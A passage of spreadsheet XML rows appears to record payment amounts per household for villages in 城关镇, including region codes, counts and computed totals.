        <v>219</v>
      </c>
      <c r="C645" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D645" s="24" t="s">
        <v>1763</v>
      </c>
      <c r="E645" s="24" t="s">
        <v>1764</v>
      </c>
      <c r="F645" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G645" s="24">
        <v>3</v>
      </c>
      <c r="H645" s="25">
        <v>290</v>
      </c>
      <c r="I645" s="24">
        <f t="shared" si="10"/>
        <v>870</v>
      </c>
      <c r="J645" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K645" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="646" customHeight="1" spans="1:11">
      <c r="A646" s="23" t="s">
        <v>1765</v>
      </c>
      <c r="B646" s="24" t="str">
        <f>B645</f>
        <v>城关镇</v>
      </c>
      <c r="C646" s="24" t="str">
        <f>C645</f>
        <v>城关西北</v>
      </c>
      <c r="D646" s="23" t="s">
        <v>1766</v>
      </c>
      <c r="E646" s="23" t="s">
        <v>1767</v>
      </c>
      <c r="F646" s="24" t="str">
        <f>F645</f>
        <v>4113210106</v>
      </c>
      <c r="G646" s="24"/>
      <c r="H646" s="24"/>
      <c r="I646" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J646" s="24"/>
      <c r="K646" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="647" customHeight="1" spans="1:11">
      <c r="A647" s="23" t="s">
        <v>1768</v>
      </c>
      <c r="B647" s="24" t="str">
        <f>B646</f>
        <v>城关镇</v>
      </c>
      <c r="C647" s="24" t="str">
        <f>C646</f>
        <v>城关西北</v>
      </c>
      <c r="D647" s="23" t="s">
        <v>1769</v>
      </c>
      <c r="E647" s="30" t="s">
        <v>1770</v>
      </c>
      <c r="F647" s="24" t="str">
        <f>F646</f>
        <v>4113210106</v>
      </c>
      <c r="G647" s="24"/>
      <c r="H647" s="24"/>
      <c r="I647" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J647" s="24"/>
      <c r="K647" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="648" customHeight="1" spans="1:11">
      <c r="A648" s="23" t="s">
        <v>1771</v>
      </c>
      <c r="B648" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C648" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D648" s="24" t="s">
        <v>1772</v>
      </c>
      <c r="E648" s="24" t="s">
        <v>1668</v>
      </c>
      <c r="F648" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G648" s="24">
        <v>1</v>
      </c>
      <c r="H648" s="25">
        <v>365</v>
      </c>
      <c r="I648" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J648" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K648" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="649" customHeight="1" spans="1:11">
      <c r="A649" s="23" t="s">
        <v>1773</v>
      </c>
      <c r="B649" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C649" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D649" s="24" t="s">
        <v>1774</v>
      </c>
      <c r="E649" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F649" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G649" s="24">
        <v>1</v>
      </c>
      <c r="H649" s="25">
        <v>365</v>
      </c>
      <c r="I649" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J649" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K649" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="650" customHeight="1" spans="1:11">
      <c r="A650" s="23" t="s">
        <v>1775</v>
      </c>
      <c r="B650" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C650" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D650" s="24" t="s">
        <v>1776</v>
      </c>
      <c r="E650" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F650" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G650" s="24">
        <v>1</v>
      </c>
      <c r="H650" s="25">
        <v>365</v>
      </c>
      <c r="I650" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J650" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K650" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="651" customHeight="1" spans="1:11">
      <c r="A651" s="23" t="s">
        <v>1777</v>
      </c>
      <c r="B651" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C651" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D651" s="24" t="s">
        <v>1779</v>
      </c>
      <c r="E651" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F651" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G651" s="24">
        <v>1</v>
      </c>
      <c r="H651" s="25">
        <v>365</v>
      </c>
      <c r="I651" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J651" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K651" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="652" customHeight="1" spans="1:11">
      <c r="A652" s="23" t="s">
        <v>1780</v>
      </c>
      <c r="B652" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C652" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D652" s="24" t="s">
        <v>1781</v>
      </c>
      <c r="E652" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F652" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G652" s="24">
        <v>2</v>
      </c>
      <c r="H652" s="25">
        <v>325</v>
      </c>
      <c r="I652" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J652" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K652" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="653" customHeight="1" spans="1:11">
      <c r="A653" s="23" t="s">
        <v>1782</v>
      </c>
      <c r="B653" s="24" t="str">
        <f>B652</f>
        <v>城关镇</v>
      </c>
      <c r="C653" s="24" t="str">
        <f>C652</f>
        <v>城关北外</v>
      </c>
      <c r="D653" s="23" t="s">
        <v>1783</v>
      </c>
      <c r="E653" s="23" t="s">
        <v>1784</v>
      </c>
      <c r="F653" s="24" t="str">
        <f>F652</f>
        <v>4113210102</v>
      </c>
      <c r="G653" s="24"/>
      <c r="H653" s="24"/>
      <c r="I653" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J653" s="24"/>
      <c r="K653" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="654" customHeight="1" spans="1:11">
      <c r="A654" s="23" t="s">
        <v>1785</v>
      </c>
      <c r="B654" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C654" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D654" s="24" t="s">
        <v>1786</v>
      </c>
      <c r="E654" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F654" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G654" s="24">
        <v>1</v>
      </c>
      <c r="H654" s="25">
        <v>365</v>
      </c>
      <c r="I654" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J654" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K654" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="655" customHeight="1" spans="1:11">
      <c r="A655" s="23" t="s">
        <v>1787</v>
      </c>
      <c r="B655" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C655" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D655" s="24" t="s">
        <v>1788</v>
      </c>
      <c r="E655" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F655" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G655" s="24">
        <v>1</v>
      </c>
      <c r="H655" s="25">
        <v>365</v>
      </c>
      <c r="I655" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J655" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K655" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="656" customHeight="1" spans="1:11">
      <c r="A656" s="23" t="s">
        <v>1789</v>
      </c>
      <c r="B656" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C656" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D656" s="24" t="s">
        <v>1790</v>
      </c>
      <c r="E656" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F656" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G656" s="24">
        <v>1</v>
      </c>
      <c r="H656" s="25">
        <v>365</v>
      </c>
      <c r="I656" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J656" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K656" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="657" customHeight="1" spans="1:11">
      <c r="A657" s="23" t="s">
        <v>1791</v>
      </c>
      <c r="B657" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C657" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D657" s="24" t="s">
        <v>1792</v>
      </c>
      <c r="E657" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F657" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G657" s="24">
        <v>2</v>
      </c>
      <c r="H657" s="25">
        <v>325</v>
      </c>
      <c r="I657" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J657" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K657" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="658" customHeight="1" spans="1:11">
      <c r="A658" s="23" t="s">
        <v>1793</v>
      </c>
      <c r="B658" s="24" t="str">
        <f>B657</f>
        <v>城关镇</v>
      </c>
      <c r="C658" s="24" t="str">
        <f>C657</f>
        <v>城关北外</v>
      </c>
      <c r="D658" s="23" t="s">
        <v>1794</v>
      </c>
      <c r="E658" s="23" t="s">
        <v>540</v>
      </c>
      <c r="F658" s="24" t="str">
        <f>F657</f>
        <v>4113210102</v>
      </c>
      <c r="G658" s="24"/>
      <c r="H658" s="24"/>
      <c r="I658" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J658" s="24"/>
      <c r="K658" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="659" customHeight="1" spans="1:11">
      <c r="A659" s="23" t="s">
        <v>1795</v>
      </c>
      <c r="B659" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C659" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D659" s="24" t="s">
        <v>1796</v>
      </c>
      <c r="E659" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F659" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G659" s="24">
        <v>1</v>
      </c>
      <c r="H659" s="25">
        <v>365</v>
      </c>
      <c r="I659" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J659" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K659" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="660" customHeight="1" spans="1:11">
      <c r="A660" s="23" t="s">
        <v>1797</v>
      </c>
      <c r="B660" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C660" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D660" s="24" t="s">
        <v>1798</v>
      </c>
      <c r="E660" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F660" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G660" s="24">
        <v>1</v>
      </c>
      <c r="H660" s="25">
        <v>365</v>
      </c>
      <c r="I660" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J660" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K660" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="661" customHeight="1" spans="1:11">
      <c r="A661" s="23" t="s">
        <v>1799</v>
      </c>
      <c r="B661" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C661" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D661" s="24" t="s">
        <v>1800</v>
      </c>
      <c r="E661" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F661" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G661" s="24">
        <v>1</v>
      </c>
      <c r="H661" s="25">
        <v>365</v>
      </c>
      <c r="I661" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J661" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K661" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="662" customHeight="1" spans="1:11">
      <c r="A662" s="23" t="s">
        <v>1801</v>
      </c>
      <c r="B662" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C662" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D662" s="24" t="s">
        <v>1802</v>
      </c>
      <c r="E662" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F662" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G662" s="24">
        <v>1</v>
      </c>
      <c r="H662" s="25">
        <v>365</v>
      </c>
      <c r="I662" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J662" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K662" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="663" customHeight="1" spans="1:11">
      <c r="A663" s="23" t="s">
        <v>1803</v>
      </c>
      <c r="B663" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C663" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D663" s="24" t="s">
        <v>1804</v>
      </c>
      <c r="E663" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F663" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G663" s="24">
        <v>1</v>
      </c>
      <c r="H663" s="25">
        <v>365</v>
      </c>
      <c r="I663" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J663" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K663" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="664" customHeight="1" spans="1:11">
      <c r="A664" s="23" t="s">
        <v>1805</v>
      </c>
      <c r="B664" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C664" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D664" s="24" t="s">
        <v>1806</v>
      </c>
      <c r="E664" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F664" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G664" s="24">
        <v>1</v>
      </c>
      <c r="H664" s="25">
        <v>365</v>
      </c>
      <c r="I664" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J664" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K664" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="665" customHeight="1" spans="1:11">
      <c r="A665" s="23" t="s">
        <v>1807</v>
      </c>
      <c r="B665" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C665" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D665" s="24" t="s">
        <v>1808</v>
      </c>
      <c r="E665" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F665" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G665" s="24">
        <v>1</v>
      </c>
      <c r="H665" s="25">
        <v>365</v>
      </c>
      <c r="I665" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J665" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K665" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="666" customHeight="1" spans="1:11">
      <c r="A666" s="23" t="s">
        <v>1809</v>
      </c>
      <c r="B666" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C666" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D666" s="24" t="s">
        <v>1810</v>
      </c>
      <c r="E666" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F666" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G666" s="24">
        <v>1</v>
      </c>
      <c r="H666" s="25">
        <v>365</v>
      </c>
      <c r="I666" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J666" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K666" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="667" customHeight="1" spans="1:11">
      <c r="A667" s="23" t="s">
        <v>1811</v>
      </c>
      <c r="B667" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C667" s="24" t="s">
        <v>1812</v>
      </c>
      <c r="D667" s="24" t="s">
        <v>1813</v>
      </c>
      <c r="E667" s="24" t="s">
        <v>1727</v>
      </c>
      <c r="F667" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G667" s="24">
        <v>2</v>
      </c>
      <c r="H667" s="25">
        <v>345</v>
      </c>
      <c r="I667" s="24">
        <f t="shared" si="10"/>
        <v>690</v>
      </c>
      <c r="J667" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K667" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="668" customHeight="1" spans="1:11">
      <c r="A668" s="23" t="s">
        <v>1814</v>
      </c>
      <c r="B668" s="24" t="str">
        <f>B667</f>
        <v>城关镇</v>
      </c>
      <c r="C668" s="24" t="str">
        <f>C667</f>
        <v>城关沙坪</v>
      </c>
      <c r="D668" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="E668" s="30" t="s">
        <v>1668</v>
      </c>
      <c r="F668" s="24" t="str">
        <f>F667</f>
        <v>4113210101</v>
      </c>
      <c r="G668" s="24"/>
      <c r="H668" s="24"/>
      <c r="I668" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J668" s="24"/>
      <c r="K668" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="669" customHeight="1" spans="1:11">
      <c r="A669" s="23" t="s">
        <v>1816</v>
      </c>
      <c r="B669" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C669" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D669" s="24" t="s">
        <v>1818</v>
      </c>
      <c r="E669" s="24" t="s">
        <v>1819</v>
      </c>
      <c r="F669" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G669" s="24">
        <v>1</v>
      </c>
      <c r="H669" s="25">
        <v>365</v>
      </c>
      <c r="I669" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J669" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K669" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="670" customHeight="1" spans="1:11">
      <c r="A670" s="23" t="s">
        <v>1820</v>
      </c>
      <c r="B670" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C670" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D670" s="24" t="s">
        <v>1821</v>
      </c>
      <c r="E670" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F670" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G670" s="24">
        <v>1</v>
      </c>
      <c r="H670" s="25">
        <v>365</v>
      </c>
      <c r="I670" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J670" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K670" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="671" customHeight="1" spans="1:11">
      <c r="A671" s="23" t="s">
        <v>1822</v>
      </c>
      <c r="B671" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C671" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D671" s="24" t="s">
        <v>1823</v>
      </c>
      <c r="E671" s="24" t="s">
        <v>902</v>
      </c>
      <c r="F671" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G671" s="24">
        <v>1</v>
      </c>
      <c r="H671" s="25">
        <v>365</v>
      </c>
      <c r="I671" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J671" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K671" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="672" customHeight="1" spans="1:11">
      <c r="A672" s="23" t="s">
        <v>1824</v>
      </c>
      <c r="B672" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C672" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D672" s="24" t="s">
        <v>1825</v>
      </c>
      <c r="E672" s="24" t="s">
        <v>575</v>
      </c>
      <c r="F672" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G672" s="24">
        <v>1</v>
      </c>
      <c r="H672" s="25">
        <v>365</v>
      </c>
      <c r="I672" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J672" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K672" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="673" customHeight="1" spans="1:11">
      <c r="A673" s="23" t="s">
        <v>1826</v>
      </c>
      <c r="B673" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C673" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D673" s="24" t="s">
        <v>1827</v>
      </c>
      <c r="E673" s="24" t="s">
        <v>1828</v>
      </c>
      <c r="F673" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G673" s="24">
        <v>1</v>
      </c>
      <c r="H673" s="25">
        <v>365</v>
      </c>
      <c r="I673" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J673" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K673" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="674" customHeight="1" spans="1:11">
      <c r="A674" s="23" t="s">
        <v>1829</v>
      </c>
      <c r="B674" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C674" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D674" s="24" t="s">
        <v>1830</v>
      </c>
      <c r="E674" s="24" t="s">
        <v>405</v>
      </c>
      <c r="F674" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G674" s="24">
        <v>1</v>
      </c>
      <c r="H674" s="25">
        <v>365</v>
      </c>
      <c r="I674" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J674" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K674" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="675" customHeight="1" spans="1:11">
      <c r="A675" s="23" t="s">
        <v>1831</v>
      </c>
      <c r="B675" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C675" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D675" s="24" t="s">
        <v>1832</v>
      </c>
      <c r="E675" s="24" t="s">
        <v>1833</v>
      </c>
      <c r="F675" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G675" s="24">
        <v>1</v>
      </c>
      <c r="H675" s="25">
        <v>365</v>
      </c>
      <c r="I675" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J675" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K675" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="676" customHeight="1" spans="1:11">
      <c r="A676" s="23" t="s">
        <v>1834</v>
      </c>
      <c r="B676" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C676" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D676" s="24" t="s">
        <v>1835</v>
      </c>
      <c r="E676" s="24" t="s">
        <v>1054</v>
      </c>
      <c r="F676" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G676" s="24">
        <v>1</v>
      </c>
      <c r="H676" s="25">
        <v>365</v>
      </c>
      <c r="I676" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J676" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K676" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="677" customHeight="1" spans="1:11">
      <c r="A677" s="23" t="s">
        <v>1836</v>
      </c>
      <c r="B677" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C677" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D677" s="24" t="s">
        <v>1837</v>
      </c>
      <c r="E677" s="24" t="s">
        <v>902</v>
      </c>
      <c r="F677" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G677" s="24">
        <v>1</v>
      </c>
      <c r="H677" s="25">
        <v>365</v>
      </c>
      <c r="I677" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J677" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K677" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="678" customHeight="1" spans="1:11">
      <c r="A678" s="23" t="s">
        <v>1838</v>
      </c>
      <c r="B678" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C678" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D678" s="24" t="s">
        <v>1839</v>
      </c>
      <c r="E678" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F678" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G678" s="24">
        <v>1</v>
      </c>
      <c r="H678" s="25">
        <v>365</v>
      </c>
      <c r="I678" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J678" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K678" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="679" customHeight="1" spans="1:11">
      <c r="A679" s="23" t="s">
        <v>1840</v>
      </c>
      <c r="B679" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C679" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D679" s="24" t="s">
        <v>1842</v>
      </c>
      <c r="E679" s="24" t="s">
        <v>753</v>
      </c>
      <c r="F679" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G679" s="24">
        <v>1</v>
      </c>
      <c r="H679" s="25">
        <v>365</v>
      </c>
      <c r="I679" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J679" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K679" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="680" customHeight="1" spans="1:11">
      <c r="A680" s="23" t="s">
        <v>1843</v>
      </c>
      <c r="B680" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C680" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D680" s="24" t="s">
        <v>1844</v>
      </c>
      <c r="E680" s="24" t="s">
        <v>1135</v>
      </c>
      <c r="F680" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G680" s="24">
        <v>1</v>
      </c>
      <c r="H680" s="25">
        <v>365</v>
      </c>
      <c r="I680" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J680" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K680" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="681" customHeight="1" spans="1:11">
      <c r="A681" s="23" t="s">
        <v>1845</v>
      </c>
      <c r="B681" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C681" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D681" s="24" t="s">
        <v>1846</v>
      </c>
      <c r="E681" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F681" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G681" s="24">
        <v>1</v>
      </c>
      <c r="H681" s="25">
        <v>365</v>
      </c>
      <c r="I681" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J681" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K681" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="682" customHeight="1" spans="1:11">
      <c r="A682" s="23" t="s">
        <v>1847</v>
      </c>
      <c r="B682" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C682" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D682" s="24" t="s">
        <v>1848</v>
      </c>
      <c r="E682" s="24" t="s">
        <v>585</v>
      </c>
      <c r="F682" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G682" s="24">
        <v>2</v>
      </c>
      <c r="H682" s="25">
        <v>325</v>
      </c>
      <c r="I682" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J682" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K682" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="683" customHeight="1" spans="1:11">
      <c r="A683" s="23" t="s">
        <v>1849</v>
      </c>
      <c r="B683" s="24" t="str">
        <f>B682</f>
        <v>城关镇</v>
      </c>
      <c r="C683" s="24" t="str">
        <f>C682</f>
        <v>城关中华村</v>
      </c>
      <c r="D683" s="37" t="s">
        <v>1850</v>
      </c>
      <c r="E683" s="31" t="s">
        <v>1851</v>
      </c>
      <c r="F683" s="24" t="str">
        <f>F682</f>
        <v>4113210108</v>
      </c>
      <c r="G683" s="24"/>
      <c r="H683" s="24"/>
      <c r="I683" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J683" s="24"/>
      <c r="K683" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="684" customHeight="1" spans="1:11">
      <c r="A684" s="23" t="s">
        <v>1852</v>
      </c>
      <c r="B684" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C684" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D684" s="24" t="s">
        <v>1853</v>
      </c>
      <c r="E684" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F684" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G684" s="24">
        <v>2</v>
      </c>
      <c r="H684" s="25">
        <v>325</v>
      </c>
      <c r="I684" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J684" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K684" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="685" customHeight="1" spans="1:11">
      <c r="A685" s="23" t="s">
        <v>1854</v>
      </c>
      <c r="B685" s="24" t="str">
        <f>B684</f>
        <v>城关镇</v>
      </c>
